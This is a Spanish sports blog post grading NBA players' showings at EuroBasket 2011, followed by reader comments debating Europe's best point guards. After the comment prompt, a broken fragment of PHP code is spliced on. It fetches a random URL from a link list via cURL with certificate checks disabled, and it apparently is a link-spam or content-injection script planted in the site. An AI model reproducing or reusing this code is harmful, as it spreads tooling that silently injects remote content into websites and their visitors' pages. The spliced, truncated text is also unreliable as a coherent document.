EuroNBAsket 2011: Notas finales NBAs (TOP-8)

21 de September de 2011 por TheDeerHunter

Evaluamos cómo lo han hecho los representantes NBA más destacados en el Eurobasket. Como era de esperar, su participación ha terminado resultando decisiva y las dos selecciones con mayor número de ellos han dominado a sus rivales. Adicionalmente 3 de los 5 mejores jugadores, en el quinteto ideal, son NBA.

ESPAÑA:

Pau Gasol: Sus promedios de 20 puntos, 8 rebotes, 2 tapones, 2 asistencias y 1 robo completan la producción más alta del campeonato. Ha sido 3º en anotación, 4º mejor reboteador, 3º en tapones… El yunque donde los campeones han machacado a sus rivales. Su ausencia significó la única derrota y aún renqueante fue vital ante Nowitzki. Nadie se hubiera podido extrañar que le hubieran elegido MVP, cuanto menos de forma compartida con Navarro, no en vano es considerado internacionalmente como el mejor jugador FIBA desde hace unos cuantos años. Muchos aseguran que, junto a su hermano, han formado la pareja interior más dominante de la historia del torneo.
Nota: Sobresaliente.

Marc Gasol: 13 puntos, 7 rebotes, 2 asistencias y 1 tapón. Aún bajo el ala protectora de su hermano mayor pero complementándolo a la perfección. Su mejor actuación con “La Roja” y consolidando su categoría de gran center mundial. En su posición ha sido de lo mejor del torneo.
Nota: Sobresaliente.

José Calderón: 6 puntos, 3 rebotes, 3 asistencias, 2 robos (8º). Ha ido de menos a más cuajando una final sobresaliente. No se ha mostrado tan brillante como en otras ocasiones pero sí altamente sólido y eficaz. No posee la potencia de antaño pero sí un juego más maduro con muy pocas fisuras. Le hacía falta un torneo que dejara un gran sabor de boca como ha sido éste.
Nota: Notable (alto)

Rudy Fernández: 8 puntos, 3.5 rebotes, 3 asistencias, 1.5 robos. Le ha tocado nuevamente bailar con la más fea. sacrificándose en condiciones de desventaja física en una posición que no es la suya. Trabajo sucio defensivo en el que rara vez se le ha podido reprochar nada, pero el consiguiente desgaste no le ha permitido brillar ofensivamente como nos hubiera gustado. Torneo muy completo.
Nota: Notable

Serge Ibaka: 7 puntos, 4 rebotes, 1 tapón (6º) en 17 minutos. Ha jugado relativamente poco y le ha faltado un punto de adaptación al contexto pero su producción a pesar de todo ha sido muy alta. Su recital de tapones en la final quedará en la retina de mucha gente. Se trata de un jugador con un potencial inimaginable.
Nota: Bien

Ricky Rubio: 1.5 puntos, 2.5 rebotes, 2 asistencias. Crisis existencial por la que está atravesando el nuevo base de los Timberwolves. Su nivel ofensivo es más que preocupante en estos momentos. Su esfuerzo defensivo ha sido bueno pero no compensa lo otro. Necesita una cura de confianza de forma urgente.
Nota: Insuficiente

FRANCIA:

Tony Parker: 22 puntos, 3.5 rebotes, 4.5 asistencias, 1.5 robos. Ha cuajado un torneo casi perfecto, a nivel MVP. Ha sido la gran actuación internacional que le hacía falta para terminar de rendir al baloncesto europeo a sus pies. Se ha mostrado imparable, máximo anotador y 5º mejor pasador, 2º en minutos de juego con una capacidad de liderazgo incuestionable y una elegancia admirable, incluso en la derrota. Para muchos, se trata del mejor base europeo de la historia.
Nota: Sobresaliente

Joakim Noah: 9 puntos, 8 rebotes, 1 asistencia, 1 robo. Representa la diferencia entre esta Francia competitiva y la versión deslabazada de sí misma que nos hemos cansado de ver todos estos años. Se trata del perfil de jugador ideal para apuntalar un proyecto ganador. Uno de los mejores defensores y reboteadores del campeonato.
Nota: Sobresaliente

Nicolas Batum: 14 puntos, 3 rebotes, 2 robos (3º), 1.5 asistencias. Vital actuación en ataque y en defensa del excepcional alero de los Blazers. De los mejores anotadores, por encima del 40% en triples y del 60% en tiros de dos, pero tercero en robos y entre los mejores defensores y taponadores del perímetro. Lo mejor de todo es que da toda la impresión que no ha tocado techo.
Nota: Sobresaliente

Boris Diaw: 8 puntos, 5 rebotes, 2.5 asistencias. Engaña el viejo Boris, con un perfil más adecuado para la barra de bar y el McDonalds que para el deporte de élite. Pero luego se destapa con sus estudiados movimientos en el poste, su fantástica lectura del juego y su sorprendente capacidad reboteadora. No cabe duda de que ya no está para el Run&Gun de los Suns, pero el tipo sabe de esto.
Nota: Notable

Kevin Seraphin: 5 puntos, 2 rebotes. No es su momento aún. Quién sabe si lo será en Londres. 9 minutitos de promedio que apenas nos han mostrado algún destello en las liguillas. Como mucho podemos afirmar que mala pinta no tiene.
Nota: N/D

RUSIA:

Andrei Kirilenko: 15 puntos, 6 rebotes, 2.5 asistencias, 2.5 robos, 1 tapón. Ha logrado parecerse al jugador total que llegó a ser all-star y mejor jugador europeo en el 2007. Aquel superclase que amargó la vida a “La Roja” en la final de Madrid. Según Blatt, el “potro salvaje” que ofrece su mejor versión cuando trota libre sin rol específico. Efectivamente ha destacado en todas las categorías siendo el jugador más completo del torneo.
Nota: Sobresaliente

Timofey Mozgov: 9.5 puntos, 4 rebotes, 1 asistencia, 1.5 tapones. Un jugador con grandes cualidades pero que no ha logrado explotar en el torneo. A la altura de su selección en cuanto a capacidad taponadora pero, quitando puntuales actuaciones y alguna que otra acción espectacular, no ha brillado particularmente. Si acaso, hasta ha llegado a decepcionar un punto en el aspecto reboteador.
Nota: Suficiente

LITUANIA:

Jonas Valanciunas: 8.5 puntos, 4 rebotes, 1 tapón, 1 asistencia y 1 robo en 16 minutos. Sabor agridulce. Empezó de palmero de Petravicius pero la lesión de éste le abrió el camino para realizar destacadas actuaciones contra España, Serbia o Alemania. Sin embargo la floja actuación contra Macedonia terminó devolviéndole al ostracismo en partidos en los que no había nada en juego. Tiene una pinta fabulosa, que evoca más a Gasol que a Sabonis, pero es muy joven y se ha notado. Diría que le deberían haber dado más confianza.
Nota: Bien

Darius Songaila: 8.5 puntos, 3 rebotes. Rol secundario en un jugador que cada vez tiene menos protagonismo en sus equipos. Como un reflejo del eje de su selección sus mejores días pasaron. Sigue aportando eficacia y experiencia, suma más que resta, pero ese es un problema para las exigencias que se manejan.
Nota: Suficiente

GRECIA:

Kostas Koufos: 9 ptos, 4 rebotes, 1 tapón. Quitando un par de buenas actuaciones su experiencia en Lituania ha sido decepcionante, no siendo capaz de destacar en la selección griega más mediocre que recordamos. Es muy joven pero mejores oportunidades que ésta para lucirse no va a tener nunca en la NBA.
Nota: Insuficiente

ESLOVENIA:

Goran Dragic: 12 puntos, 4 rebotes, 3 asistencias, 2 robos. El aparentemente buen rendimiento de Dragic suele dejar la sensación de que tiene peor efecto en su equipo que en las tablas. Va un poco intrínseco al sujeto. Casualmente su mejor rendimiento fue tras el partido de España, cuando ya perdían por un carro de puntos. Antes de eso, combinó grandes momentos en el banquillo con una aportación discutible como base referencia del campeonato. Y el caso es que el chaval posee cualidades.
Nota: Insuficiente

Comenta

16 comentarios a esta entrada

  1. Txusma dice:
    #1

    A ver, que den un paso al frente los que piensen que Tony Parker es el mejor base europeo de la historia…

    Djorjevic, Jasikevicius, Valters, Delibasic, Bodiroga…

      Citar

  2. TheDeerHunter dice:
    #2

    Por mi parte no será… no soy un experto en baloncesto europeo, pero de los que he visto jugar suficientemente me quedo tanto con Jasikevicius como con Djordjervic.
    De todas formas siempre me cuesta ubicar a Parker dentro de este contexto, porque como a algún otro ilustre lo considero más americano que otra cosa. De entrada la propia filosofía me parece muy alejada del basket fiba.

    Independientemente de estas pajas mentales Parker es un grande… desconozco si el 1º o el 8º más grande. Y dudo mucho que haya habido ninguno en Europa con unas condiciones más adecuadas para competir entre los mejores.

      Citar

  3. Jose_Dantley dice:
    #3

    TheDeerHunter dice:

    “Y dudo mucho que haya habido ninguno en Europa con unas condiciones más adecuadas para competir entre los mejores.”

    Gran reflexión ¡¡¡

    No voy a entrar en ese tema, no me toca hoy. Solo quería decir que aparte de estar en casi todo de acuerdo con el enorme resumen de los NBA en el Eurobasket, que Ibaka creo que ha sido más vital de lo que parece. Lo que ha aportado como suplente está a una altura difícilmente superable. En la final es evidente, hubo buena parte del partido en el que la diferencia de puntos eran justamente las canastas que Ibaka había directamente evitado. Pero creo que en el resto también.

    Para mí han salido reforzados o en algún caso muy reforzados: Gasol&Gasol, Ibaka, Parker, Noah, Batum, Kirilenko, Valanciunas y Koponen. Me quedo con la duda de Kanter, más verde de lo que esperaba pero que tener, tiene; y quizá Asik que tiros libres aparte sigue teniendo claro lo que puede dar.

    Han salido perjudicados en su imagen y casi que en sus perspectivas de futuro: Ricky, Koufos, Dragic, Ilyasova y los italianos.

      Citar

  4. Txusma dice:
    #4

    Los italianos como conjunto o individualmente? A ver, Italia más allá de Bargnani, Gallinari y Bellinelli no era nada. Con sólo 3 buenos jugadores no vas a ninguna parte. En el plano individual, Bargnani y Gallinari creo que han cumplido. Solo eso, cumplir.

      Citar

  5. Jose_Dantley dice:
    #5

    Me refiero a los 3 NBA’s. Se puede salvar Bargnani, porque en los dos partidos en los que estaban obligados a ganar (Letonia e Israel) estuvo a la altura, pero los tres NBA deberían haber bastado para pasar a la segunda fase. Con mucho menos estuvieron Finlandia y Georgia y si me apuras Eslovenia y Macedonia.

      Citar

  6. Txusma dice:
    #6

    En el grupo de Italia jugaban tb Francia, Serbia y Alemania, claramente por encima de Italia por mucho 3 NBA que tuviera. Compara ese grupo con el C (Macedonia, Grecia, Finlandia, Croacia, Bosnia y Montenegro).
    Italia está pasando por una auténtica travesía del desierto en lo que a Baloncesto se refiere. No estuvieron en el Europeo de 2009, ni en el Mundial de 2010, ni en los JJOO de 2008.

      Citar

  7. TheDeerHunter dice:
    #7

    No se si la reflexión es grande o pequeña…

    Yo tampoco quiero iniciar debate, pero las condiciones están muy bien y está mejor aprovecharlas como lo hace Parker, pero también me sé de algunos que sin ese tipo de condiciones han sido/son muy grandes.
    Así a bote pronto me vienen a la cabeza Navarro o Larry Bird.

    Lo que quiero decir es que la reflexión no es ni mucho menos definitiva sobre si Parker ha sido el mejor base Europeo o no.

      Citar

  8. Denise dice:
    #8

    De los que he visto el mejor Parker…despues vendrían Djorjevic, Jasikevicius y el ruso nacido en el centro de Moscú JR Holden.

      Citar

  9. Sancho88 dice:
    #9

    Me sumo al debate. No sé si será porque era un renacuajo, pero recuerdo a Sasha Djordjevic como lo mejor que se podía ver en un partido de baloncesto, además de Bodiroga, Perasovic, etc.

    Me daba la impresión que sólo con él en la cancha podías ganar tranquilamente un título. Por impresiones, yo me quedo con Djordjevic. Ahora bien, que ha habido grandes bases en Europa, sin ninguna duda. De todos los que estamos hablando todos han sido puras máquinas de este deporte. Sin olvidarnos de Teo Papaloukas, por supuesto, y el relevo de Diamantidis, que sin ser base puro ha dado un recital de tal magnitud en la dirección del Paok y la consiguiente victoria en Euroliga que no es descabeyado incluirile en esta lista.

    Tony Parker? Por supuesto, un ser anómalo. Si ponemos los anillos encima de la mesa, ya pueden irse todos los que hemos dicho, pero claro, el chico ha vivido casi siempre en Estados Unidos, y aquí solo jugó un par de años. Es difícil de comparar, dos baloncestos completamente diferentes. Si hablamos de base puro, yo descartaría de plano a Parker, que aunque es su puesto de juego, yo le encuentro bastantes carencias en la dirección, y más que carencias, tratándose de un jugador así, que las cualidades las tiene para dirigir, le veo un poco ‘chuponcete’. Es que es totalmente diferente a ningún otro base que haya jugado en Europa.

    El debate en este caso es complicado.

    Y las valoraciones me parecen correctas. Preocupa Ricky, por supuesto. Ha frenado su progresión, y actualmente con su nivel hay 500 chicos más en Estados Unidos. Veremos si es capaz de traspasar la frontera mediática y convertirse en el jugador que todos esperamos que puede llegar a ser, porque si no va a durar menos que el chacho Rodríguez.

    Kevin Seraphin. Yo creo que este chico es el pívot del futuro en Europa. Muy buena pinta, con movimientos ilimitados en ataque. Le falta bastante actitud defensiva. Pero me parece que eso no es preocupante, ya que acaba de caer en manos del señor Dusko Ivanovic. Así que… o defiende o defiende.

      Citar

  10. Txusma dice:
    #10

    De Djorjevic lo primero que me viene a la memoria es su tiro en carrera. Simplemente impresionante.

    De todos los bases que comentáis creo que se claro que si uno ha de triunfar en la NBA ese ha de ser Parker. Su físico y estilo de juego encaja como anillo al dedo. De hecho, aparte de Parker y Calderon algún otro base europeo ha triunfado mínimamente en la NBA? Ahora no me viene ninguno más a la cabeza.

      Citar

  11. Nacho dice:
    #11

    Y dirigir al equipo, y morder si había que hacerlo, y sobre todo, GANAR.

    Los bases anteriores no pudieron triunfar en la NBA porque ésta aún no se preocupaba de lo que había fuera de sus fronteras, sino, muchos de la antigua yugoeslavia habrían triunfado.

      Citar

  12. M dice:
    #12

    Podíamos poner a Gallis a jugar de base, también, y sería difícil elegir 😀 Corbalán debía ser magnífico, también.

      Citar

  13. Nacho dice:
    #13

    Gallis puramente era un 2. Tenía al lado a Yannackis, un pedazo de base, que siempre fue el escudero de Gallis. éste era un espectáculo anotando. Creo que hizo campeona a Grecia en algún europeo, y medalla en algún mundial, y éstos tenían un secarral alrededor. Gracias a ellos hemos tenido una generación de buenísimos jugadores helenos.
    Corbalán era muy bueno, como Solozábal, pero creo que mejor que ellos es Calderón, además bastante similares, sobre todo a Corba.
    Siempre será difícil decir quién es mejor salvo que su incidencia sea superlativa (caso de Gasol en España) a mí me gusta mucho Papaloukas, pero es más como concepto de juego. Parker es buenísimo, pero me llega menos. Djorjevic era la caña y asumió galones donde era difícil asumirlos. Jasickevicius espectacular, pero siempre le faltó algo. Corbalán me encantó, pero no se le podría poner en el podio de los mejores, como Calderón, que a mí es el que más me gusta (junto con Papaloukas) pero soy consciente de que no se le puede decir el mejor, aunque aporte otras muchas cosas. No recuerdo ahora bases de la URSS, seguro que porque no eran determinantes como alas y pivots que sí recuerdo.
    El caso es que piensas en los mejores jugadores europeos de la historia y es difícil poner un base al lado de Petrovic, Sabonis, Pau, Bodiroga, Gallis (imagináis este quinteto en plenitud) y con Kukoc, Divac, Delibasic o Dalipagic, Homicius, Kurtinaitis (vale, soy el más viejo del lugar, me callo)

      Citar

  14. Denise dice:
    #14

    ¿Y qué sobre Valters? Base de la URSS ahora letón. Yo no lo he visto, pero dicen que era muy bueno

      Citar

  15. Txusma dice:
    #15

    Yo lo he nombrado. De hecho, he leído alguno que lo consideraba el mejor europeo de la historia por encima de cualquier otro.

      Citar

  16. luisguada dice:
    #16

    Como base ruso o sovietico podriamosrecordar a Marciuilonis, con un juego muy próximo a los combo-guard americanos posiblemente de aparecer unos años más tarde hubiera hecho mucha mejor carrera NBA, en cuanto a Corbalan, no creo que tuviera nada que envidiar a nadie a la hora de manejar el tempo de un partido.
    Por lo demás, de acuerdo con que Parker es el base europeo más determinante que he visto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>